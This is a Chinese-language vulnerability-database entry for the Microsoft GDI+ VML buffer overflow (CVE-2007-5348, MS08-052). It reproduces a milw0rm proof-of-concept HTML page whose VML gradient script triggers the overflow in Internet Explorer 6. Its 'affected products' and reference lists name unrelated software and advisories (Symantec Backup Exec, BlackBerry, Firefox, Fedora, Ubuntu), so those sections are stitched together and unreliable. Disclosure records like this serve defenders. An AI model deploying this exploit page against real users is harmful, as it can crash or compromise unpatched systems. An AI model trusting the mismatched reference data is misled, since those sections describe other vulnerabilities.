Microsfot GDI+ VML 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116266 漏洞类型 数字错误
发布时间 2008-09-28 更新时间 2009-04-01
CVE编号 CVE-2007-5348 CNNVD-ID CNNVD-200809-176
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/6619
https://www.securityfocus.com/bid/31018
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-176
|漏洞详情
MicrosoftGDI+通过基于类的API提供对各种图形方式的访问。多款Microsft软件(InternetExplorer6SP1,WindowsXPSP2andSP3,Server2003SP1andSP2,VistaGoldandSP1,Server2008,OfficeXPSP3,Office2003SP2andSP3,2007MicrosoftOfficeSystemGoldandSP1,Visio2002SP2,PowerPointViewer2003,Works8,DigitalImageSuite2006,SQLServer2000ReportingServicesSP2,SQLServer2005SP2,ReportViewer2005SP1and2008,andForefrontClientSecurity1.0)使用的GDI+中存在整数溢出漏洞。远程攻击者可利用在梯度填充包含特制梯度尺寸的图片文件,与触发缓冲区溢出,从而执行任意指令。该漏洞与GdiPlus.dll和VGX.dll相关,也称为"GDI+VML缓冲区溢出漏洞"。
|漏洞EXP
<html>
<head>
<STYLE>
ef\:* { behavior: url(#default#VML); } 
</STYLE>
</head>

<body>

<pre>
================================================
MS08-052: GDI+ Vulnerability
------------------------------------------------
Operating System: XP SP2
Internet Explorer Version: 6.0.2900.2180
Gdiplus.dll Version: 5.1.3102.2180

Credit:
John Smith,
Evil Fingers

Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability.txt
================================================
</pre>

<XML:NAMESPACE  ns="urn:schemas-microsoft-com:vml" prefix="ef">


<ef:oval style='left: 500; top: 500; width: 500px; height: 500px;' fill="true" id='ef_oval'>
<ef:fill type="gradientCenter";></ef:fill>
</ef:oval>
		
<script>
var focus_size = "-5, -4";
var focus_pos = ".1, .1";
var ef_oval = document.getElementById('ef_oval');

ef_oval.fill.focussize = focus_size;
ef_oval.fill.focusposition = focus_pos;
</script>
</body>
</html>

# milw0rm.com [2008-09-28]
|受影响的产品
Symantec Backup Exec for Windows Servers 12.0 Symantec Backup Exec for Windows Servers 11d Rim Blackberry Unite! 1.0.1 bundle 36 Rim Blackberry Unite! 1.0.1 Rim Blackberry Unite! 1.0
|参考资料

来源:FEDORA
名称:FEDORA-2008-8429
链接:https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01403.html
来源:FEDORA
名称:FEDORA-2008-8401
链接:https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01384.html
来源:FEDORA
名称:FEDORA-2008-8425
链接:https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01335.html
来源:bugzilla.mozilla.org
链接:https://bugzilla.mozilla.org/show_bug.cgi?id=444077
来源:bugzilla.mozilla.org
链接:https://bugzilla.mozilla.org/show_bug.cgi?id=444075
来源:XF
名称:firefox3-xpcnativewrappers-code-execution(45349)
链接:http://xforce.iss.net/xforce/xfdb/45349
来源:VUPEN
名称:ADV-2009-0977
链接:http://www.vupen.com/english/advisories/2009/0977
来源:UBUNTU
名称:USN-647-1
链接:http://www.ubuntu.com/usn/usn-647-1
来源:UBUNTU
名称:USN-645-2
链接:http://www.ubuntu.com/usn/usn-645-2
来源:UBUNTU
名称:USN-645-1
链接:http://www.ubuntu.com/usn/usn-645-1
来源:SECTRACK
名称:1020915
链接:http://www.securitytracker.com/id?1020915
来源:BID
名称:31346
链接:http://www.securityfocus.com/bid/3